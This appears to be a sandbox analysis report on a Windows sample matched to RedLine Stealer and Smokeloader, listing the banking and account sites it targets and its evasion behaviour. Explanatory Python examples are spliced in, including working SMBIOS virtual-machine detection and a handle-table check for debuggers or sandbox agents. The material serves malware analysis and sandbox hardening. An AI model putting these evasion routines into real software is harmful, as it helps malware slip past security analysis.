Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code functions: 0_2_0040B81C, 0_2_0042C0DA, 0_2_00434080, 0_2_0040E14E, 0_2_0040A928, 0_2_0040B129, 0_2_0042B9C5, 0_2_004069A1, 0_2_0041F9A4, 0_2_0041C270, 0_2_0042F278, 0_2_0040620B, 0_2_00430228, 0_2_004052D9, 0_2_00436ADC, 0_2_00405AAA, 0_2_0043B362, 0_2_00402476, 0_2_0042FD35, 0_2_0042AD82, 0_2_0042D658, 0_2_00430E6C, 0_2_00438E28, 0_2_0042CFBA, 0_2_0041204D, 0_2_00441057, 0_2_00415070, 0_2_00448800, 0_2_0043D8D0, 0_2_0041E083, 0_2_0044915B, 0_2_0045D15A, 0_2_0041316D, 0_2_0040112C, 0_2_004279E0, 0_2_0041D1E9, 0_2_004109FC, 0_2_0040D994, 0_2_0044F244, 0_2_0041AA49, 0_2_0041B251, 0_2_00429A5B, 0_2_00410218, 0_2_00410A33, 0_2_00414A83, 0_2_0044234A, 0_2_0040136E, 0_2_00457B30, 0_2_00428334, 0_2_0041EBEB, 0_2_00415C7E, 0_2_00418413, 0_2_0043A4FE, 0_2_00424C8D, 0_2_0043BCA4, 0_2_00416548, 0_2_00439535, 0_2_0041764A, 0_2_0043D600, 0_2_004126B9, 0_2_00429730, 0_2_00434FAC
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEE2EA0_2_02EEE2EA
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F042E70_2_02F042E7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF9ADA0_2_02EF9ADA
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE52D70_2_02EE52D7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F112BE0_2_02F112BE
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE22B40_2_02EE22B4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDBA830_2_02EDBA83
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F18A670_2_02F18A67
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFD2210_2_02EFD221
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F052130_2_02F05213
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F003F50_2_02F003F5
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDDBFB0_2_02EDDBFB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F2D3C10_2_02F2D3C1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F193C20_2_02F193C2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE33D40_2_02EE33D4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDE3B50_2_02EDE3B5
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDAB8F0_2_02EDAB8F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EDB3900_2_02EDB390
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFC3410_2_02EFC341
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0DB370_2_02F0DB37
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F010D30_2_02F010D3
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFD8BF0_2_02EFD8BF
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE78B10_2_02EE78B1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0908F0_2_02F0908F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0D8670_2_02F0D867
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF99970_2_02EF9997
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE29200_2_02EE2920
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE5EE50_2_02EE5EE5
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF9EE20_2_02EF9EE2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF4EF40_2_02EF4EF4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED26DD0_2_02ED26DD
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE867A0_2_02EE867A
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEEE520_2_02EEEE52
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFAFE90_2_02EFAFE9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE67AF0_2_02EE67AF
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0979C0_2_02F0979C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0A7650_2_02F0A765
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0BF0B0_2_02F0BF0B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF9CC20_2_02EF9CC2
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFF4DF0_2_02EFF4DF
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEC4D70_2_02EEC4D7
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEB4B80_2_02EEB4B8
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F1F4AB0_2_02F1F4AB
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEACB00_2_02EEACB0
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0048F0_2_02F0048F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EE047F0_2_02EE047F
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED64720_2_02ED6472
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF7C470_2_02EF7C47
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EED4500_2_02EED450
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFBC2C0_2_02EFBC2C
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED6C080_2_02ED6C08
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EEFC0B0_2_02EEFC0B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F0B5C90_2_02F0B5C9
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EFA5D40_2_02EFA5D4
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F125B10_2_02F125B1
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02EF859B0_2_02EF859B
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED55400_2_02ED5540
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02F06D430_2_02F06D43
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeCode function: 0_2_02ED5D110_2_02ED5D11
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Process token adjusted: Load Driver
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: String function: 00438E28 appears 39 times
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: String function: 02EDE3B5 appears 36 times
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: String function: 0043D070 appears 51 times
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: String function: 02EDA905 appears 38 times
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: String function: 0040E14E appears 52 times
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: String function: 004360E1 appears 144 times
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: String function: 02F0D2D7 appears 50 times
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 1708
Source: I2BJhmJou4.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.3246383027.0000000002F69000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c (reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12)
Source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f (reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23)
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@2/5@0/1
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_02F69F2E CreateToolhelp32Snapshot,Module32First (0_2_02F69F2E)
Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7500
Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\98cb422e-58a4-48c6-adc8-84ceefbc0aca
Source: I2BJhmJou4.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.0000000005659000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3247217603.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3247217603.0000000005008000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: I2BJhmJou4.exe | ReversingLabs: Detection: 84%
Source: unknown | Process created: C:\Users\user\Desktop\I2BJhmJou4.exe "C:\Users\user\Desktop\I2BJhmJou4.exe"
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7500 -s 1708
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Sections loaded (in order): apphelp.dll, msimg32.dll, msvcr100.dll, fltlib.dll, my-global-render.dll, sspicli.dll, dpapi.dll, cryptbase.dll, winhttp.dll, ondemandconnroutehelper.dll, webio.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, uxtheme.dll, kernel.appcore.dll
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                  Data Obfuscation

Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Unpacked PE file: 0.2.I2BJhmJou4.exe.400000.0.unpack; section table .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Unpacked PE file: 0.2.I2BJhmJou4.exe.400000.0.unpack
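The two section layouts in the row above are what the "Detected unpacking (changes PE section rights)" and "overwrites its own PE header" verdicts rest on: the image running at 0x400000 no longer carries the section table of the file on disk. The example below is added for this page (it is neither Joe Sandbox code nor code from the sample): it parses the section table out of a PE header buffer, renders each section's memory rights, and diffs the on-disk and in-memory tables. The two headers it builds are constructed to mirror the layouts in the row, on the assumption that the second layout in the "vs" is the original file's table; the E/R/W notation is the example's own and prints RW where the report prints W.

```python
import struct

# Section characteristic bits from winnt.h
IMAGE_SCN_CNT_CODE             = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE          = 0x20000000
IMAGE_SCN_MEM_READ             = 0x40000000
IMAGE_SCN_MEM_WRITE            = 0x80000000


def parse_sections(pe: bytes):
    """Return [(name, characteristics)] from the section table of a PE buffer.
    Only the headers are read, so a partial dump of the image base is enough."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    # IMAGE_FILE_HEADER follows the 4-byte signature:
    # Machine(2) NumberOfSections(2) TimeDateStamp(4) PointerToSymbolTable(4)
    # NumberOfSymbols(4) SizeOfOptionalHeader(2) Characteristics(2)
    num_sections, = struct.unpack_from("<H", pe, e_lfanew + 6)
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(num_sections):
        hdr = pe[table + 40 * i: table + 40 * (i + 1)]
        if len(hdr) < 40:
            raise ValueError("truncated section table")
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        characteristics, = struct.unpack_from("<I", hdr, 36)
        sections.append((name, characteristics))
    return sections


def rights(characteristics: int) -> str:
    """E/R/W summary of a section's memory protection bits."""
    return ("E" if characteristics & IMAGE_SCN_MEM_EXECUTE else "") + \
           ("R" if characteristics & IMAGE_SCN_MEM_READ else "") + \
           ("W" if characteristics & IMAGE_SCN_MEM_WRITE else "")


def layout(pe: bytes) -> str:
    """Compact 'name:rights;' string, in the spirit of the report's notation."""
    return "".join(f"{name}:{rights(c)};" for name, c in parse_sections(pe))


def section_table_changed(disk_pe: bytes, memory_pe: bytes) -> bool:
    """True when the section table the process runs with differs from the file's,
    in section names or in E/R/W rights."""
    return layout(disk_pe) != layout(memory_pe)


def build_pe(sections) -> bytes:
    """Construct a minimal PE32 header carrying the given section table.
    Sample data for this example, not bytes from I2BJhmJou4.exe."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    optional = struct.pack("<H", 0x10B) + b"\0" * 222          # PE32 magic, 224 bytes total
    # RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE, the flags the report lists
    file_hdr = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, len(optional), 0x0103)
    table = b"".join(name.encode().ljust(8, b"\0") + b"\0" * 28 + struct.pack("<I", chars)
                     for name, chars in sections)
    return dos + b"PE\0\0" + file_hdr + optional + table


# Constructed section tables modelled on the two layouts in the report
ON_DISK = build_pe([
    (".text",  IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rdata", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
    (".data",  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".reloc", IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])
IN_MEMORY = build_pe([
    (".text",  IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".data",  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE),
    (".rsrc",  IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ),
])

if __name__ == "__main__":
    print("disk   :", layout(ON_DISK))
    print("memory :", layout(IN_MEMORY))
    print("changed:", section_table_changed(ON_DISK, IN_MEMORY))
```

When triaging a live dump, feed `parse_sections` the first page of the module as read from the process and the first page of the file on disk; a differing table means the section headers themselves were rewritten, which is a stronger unpacking signal than a changed page protection alone, because VirtualProtect changes never touch the header.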
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00464074 push B000468Ch; retn 0044h (0_2_00464079)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00463CAD push esi; ret (0_2_00463CB6)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00403D6C push eax; mov dword ptr [esp], 00000000h (0_2_00403D71)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00452768 push ecx; ret (0_2_0045277B)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_02F229CF push ecx; ret (0_2_02F229E2)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_02ED3FD3 push eax; mov dword ptr [esp], 00000000h (0_2_02ED3FD8)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 times)
Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (50 times)

                  Malware Analysis System Evasion

Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00401FF9 Sleep,ExitProcess (0_2_00401FF9)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_02ED2260 Sleep,ExitProcess (0_2_02ED2260)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep (graph_0-74297)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess (graph_0-74297)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | System information queried: FirmwareTableInformation
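FirmwareTableInformation is the SystemFirmwareTableInformation class of NtQuerySystemInformation, which hands a process the raw SMBIOS (or ACPI) tables; that is the usual reason the report flags it under "Query firmware table information (likely to detect VMs)". On this sandbox the SMBIOS BIOS and System Information structures carry the "VMware, Inc." / "VMW201.00V.20829224.B64.2211211842" / "VMware20,1" strings that the Amcache entry further down in this section lists. The example below is added for this page (not the sample's code) and parses an SMBIOS structure table the way such a check does, then reports which VM vendor markers it finds; the embedded table is constructed from those three strings plus filler, the marker list is the example's own, and the GetSystemFirmwareTable reader at the end runs only on Windows.

```python
import struct

# Vendor markers a VM-aware sample typically looks for in the SMBIOS strings
VM_MARKERS = ("VMware", "VirtualBox", "innotek", "QEMU", "Xen", "Hyper-V", "Parallels")


def parse_smbios(table: bytes):
    """Walk an SMBIOS structure table and yield (type, handle, formatted_area, strings).
    Each structure is a 4-byte header, a formatted area, then NUL-terminated strings
    closed by an extra NUL (a structure with no strings ends in two NULs)."""
    pos = 0
    while pos + 4 <= len(table):
        stype, length, handle = struct.unpack_from("<BBH", table, pos)
        if length < 4:
            raise ValueError(f"bad structure length at offset {pos}")
        formatted = table[pos + 4:pos + length]
        cursor = pos + length
        strings = []
        while True:
            end = table.index(b"\0", cursor)
            s = table[cursor:end]
            cursor = end + 1
            if not s:
                break
            strings.append(s.decode("ascii", "replace"))
        if not strings:
            cursor += 1          # skip the second NUL of an empty string set
        yield stype, handle, formatted, strings
        pos = cursor
        if stype == 127:         # End-of-Table structure
            break


def smbios_string(strings, index):
    """Resolve a 1-based string index from a formatted area (0 means 'no string')."""
    return strings[index - 1] if 0 < index <= len(strings) else ""


def firmware_identity(table: bytes) -> dict:
    """BIOS vendor/version (type 0) and system manufacturer/product (type 1):
    the fields a VM check reads, and the ones the Amcache entry in this report lists."""
    info = {}
    for stype, _handle, fmt, strings in parse_smbios(table):
        if stype == 0 and len(fmt) >= 2:
            info["bios_vendor"] = smbios_string(strings, fmt[0])
            info["bios_version"] = smbios_string(strings, fmt[1])
        elif stype == 1 and len(fmt) >= 2:
            info["system_manufacturer"] = smbios_string(strings, fmt[0])
            info["system_product"] = smbios_string(strings, fmt[1])
    return info


def vm_markers(table: bytes):
    """Every VM_MARKERS entry that occurs in any SMBIOS string, sorted."""
    hits = set()
    for _stype, _handle, _fmt, strings in parse_smbios(table):
        for s in strings:
            hits.update(m for m in VM_MARKERS if m.lower() in s.lower())
    return sorted(hits)


def build_structure(stype, handle, formatted, strings) -> bytes:
    """Encode one SMBIOS structure (used only to construct the sample below)."""
    header = struct.pack("<BBH", stype, 4 + len(formatted), handle) + formatted
    text = b"".join(s.encode("ascii") + b"\0" for s in strings) + b"\0" if strings else b"\0\0"
    return header + text


# Constructed table. The vendor, version and product strings are the ones the
# report's Amcache entry shows for this sandbox; everything else is filler.
SAMPLE_TABLE = (
    build_structure(0, 0x0000, bytes([1, 2]) + b"\0" * 18,
                    ["VMware, Inc.", "VMW201.00V.20829224.B64.2211211842"])
    + build_structure(1, 0x0001, bytes([1, 2, 0, 0]) + b"\0" * 19,
                      ["VMware, Inc.", "VMware20,1"])
    + build_structure(127, 0x0002, b"", [])
)


def read_live_smbios_windows() -> bytes:
    """On Windows, fetch the real table with GetSystemFirmwareTable('RSMB'), which
    kernel32 implements over NtQuerySystemInformation(SystemFirmwareTableInformation),
    and drop the 8-byte RawSMBIOSData header. Not exercised by the offline sample."""
    import ctypes
    kernel32 = ctypes.windll.kernel32
    RSMB = 0x52534D42
    size = kernel32.GetSystemFirmwareTable(RSMB, 0, None, 0)
    buf = ctypes.create_string_buffer(size)
    kernel32.GetSystemFirmwareTable(RSMB, 0, buf, size)
    return buf.raw[8:]


if __name__ == "__main__":
    print(firmware_identity(SAMPLE_TABLE))
    print("VM markers:", vm_markers(SAMPLE_TABLE))
```

Running `read_live_smbios_windows` inside an analysis VM and passing the result to `vm_markers` shows exactly what the sample sees; a sandbox that wants to survive this check has to rewrite the type 0 and type 1 strings in the table it exposes, not merely the registry or WMI views derived from it.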
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00429EF7 rdtsc (0_2_00429EF7)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_0041F9A4 GetCurrentProcessId,NtDuplicateObject,NtClose,GetProcessId,NtQuerySystemInformation,NtQuerySystemInformation (0_2_0041F9A4)
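The chain in the row above (GetCurrentProcessId, NtDuplicateObject, NtClose, GetProcessId, then NtQuerySystemInformation twice) together with the HandleInformation query earlier in this section is the shape of a well-known handle-table check: duplicate the process pseudo-handle into a real handle (the -1 pseudo-handle never appears in the system handle table), query SystemHandleInformation (the first call with a small buffer fails with STATUS_INFO_LENGTH_MISMATCH and reports the size, the second fills it), locate the entry for the duplicated handle to learn the kernel object address, and then look for other processes holding a handle to that same object. A debugger or sandbox agent holds one; the parent normally holds one too from CreateProcess. The report does not state that this is what 0_2_0041F9A4 does, so the purpose is an inference. The example below is added for this page (not the sample's code): it parses a SYSTEM_HANDLE_INFORMATION buffer in the 32-bit layout this SysWOW64 process would receive and applies that logic to a constructed table. PID 7500 is taken from the WerFault command line in this report; the other PIDs, handle values and object addresses are made up.

```python
import struct
from collections import namedtuple

# SYSTEM_HANDLE_TABLE_ENTRY_INFO as a 32-bit process receives it from
# NtQuerySystemInformation(SystemHandleInformation): 16 bytes per entry,
# preceded by a ULONG NumberOfHandles. (A 64-bit process gets 24-byte entries.)
ENTRY = struct.Struct("<HHBBHII")
HandleEntry = namedtuple("HandleEntry",
                         "pid backtrace_index type_index attributes handle object access")


def parse_handle_table(buf: bytes):
    """Decode a SYSTEM_HANDLE_INFORMATION buffer into HandleEntry records."""
    count, = struct.unpack_from("<I", buf, 0)
    if len(buf) < 4 + count * ENTRY.size:
        raise ValueError("buffer shorter than NumberOfHandles implies")
    return [HandleEntry(*ENTRY.unpack_from(buf, 4 + i * ENTRY.size)) for i in range(count)]


def processes_holding_handle(buf: bytes, own_pid: int, own_handle: int):
    """PIDs other than own_pid that hold a handle to the same kernel object as
    own_handle. own_handle must be a real handle to the current process (hence the
    NtDuplicateObject step in the API chain); the -1 pseudo-handle is never listed."""
    entries = parse_handle_table(buf)
    mine = [e for e in entries if e.pid == own_pid and e.handle == own_handle]
    if not mine:
        raise LookupError("own handle not present in the table")
    target = mine[0].object
    return sorted({e.pid for e in entries if e.object == target and e.pid != own_pid})


def unexpected_holders(buf: bytes, own_pid: int, own_handle: int, parent_pid: int):
    """The evasion decision: the parent normally keeps the handle CreateProcess gave it,
    so any other holder (debugger, sandbox agent) is what such a check is looking for."""
    return [p for p in processes_holding_handle(buf, own_pid, own_handle) if p != parent_pid]


def build_handle_table(rows) -> bytes:
    """Serialise (pid, handle, object, access) rows in the kernel's layout.
    ObjectTypeIndex for Process objects is build-specific, so a placeholder is used."""
    PLACEHOLDER_TYPE_INDEX = 7
    body = b"".join(ENTRY.pack(pid, 0, PLACEHOLDER_TYPE_INDEX, 0, handle, obj, access)
                    for pid, handle, obj, access in rows)
    return struct.pack("<I", len(rows)) + body


# Constructed table. 7500 is the sample's PID in this report (WerFault was started
# with -p 7500); the other PIDs, handle values and object addresses are made up.
SELF_PID, SELF_HANDLE, SELF_OBJECT = 7500, 0x0040, 0x8A1B2C00
PARENT_PID = 4120
SAMPLE_TABLE = build_handle_table([
    (SELF_PID,   SELF_HANDLE, SELF_OBJECT, 0x001FFFFF),  # our NtDuplicateObject result
    (SELF_PID,   0x0044,      0x8A77D120,  0x00100001),  # unrelated handle we also own
    (PARENT_PID, 0x01C8,      SELF_OBJECT, 0x001FFFFF),  # parent's handle from CreateProcess
    (5632,       0x0310,      SELF_OBJECT, 0x001FFFFF),  # extra holder: debugger or sandbox agent
    (612,        0x009C,      0x8A77D120,  0x00100001),
])

if __name__ == "__main__":
    print("holders   :", processes_holding_handle(SAMPLE_TABLE, SELF_PID, SELF_HANDLE))
    print("unexpected:", unexpected_holders(SAMPLE_TABLE, SELF_PID, SELF_HANDLE, PARENT_PID))
```

For a sandbox author the takeaway is the mirror image: any agent that keeps a PROCESS_ALL_ACCESS handle open to the sample for the whole run is visible through this query, so such handles should be opened only when needed and closed immediately afterwards.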
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes (graph_0-74312)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00451F08 FindFirstFileExW (0_2_00451F08)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_00451FBC FindFirstFileExW,FindNextFileW,FindClose,FindClose (0_2_00451FBC)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_02F22223 FindFirstFileExW,FindNextFileW,FindClose,FindClose (0_2_02F22223)
Source: C:\Users\user\Desktop\I2BJhmJou4.exe | Code function: 0_2_02F2216F FindFirstFileExW (0_2_02F2216F)
Source: I2BJhmJou4.exe, 00000000.00000003.2003155936.0000000005072000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696494690p
Source: Amcache.hve.8.dr | Binary or memory string: VMware
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696494690
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.8.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: I2BJhmJou4.exe, 00000000.00000002.3246415805.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3247217603.0000000005034000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
